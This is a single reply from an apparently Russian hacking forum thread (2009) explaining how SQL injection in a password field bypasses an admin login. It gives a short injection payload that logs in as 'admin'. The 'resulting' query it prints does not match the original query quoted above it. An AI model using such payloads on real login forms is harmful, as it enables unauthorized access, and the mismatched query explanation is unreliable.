Показать сообщение отдельно

  #7  
Старый 10.01.2009, 19:34
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Цитата:
Сообщение от ronald  
А как реализовывается обход авторизации к примеру в данном случае
SELECT * FROM adminpanel WHERE pass = ' ' ?
если уязвимо поле pass то в это поле пишем
Код:
12345' OR login='admin'; --
запрос станет таким
Код:
SELECT * FROM adminpanel WHERE (login='admin' AND pass='12345') OR (login='admin');
авторизация будет успешна пройдена под логином admin
 
Ответить с цитированием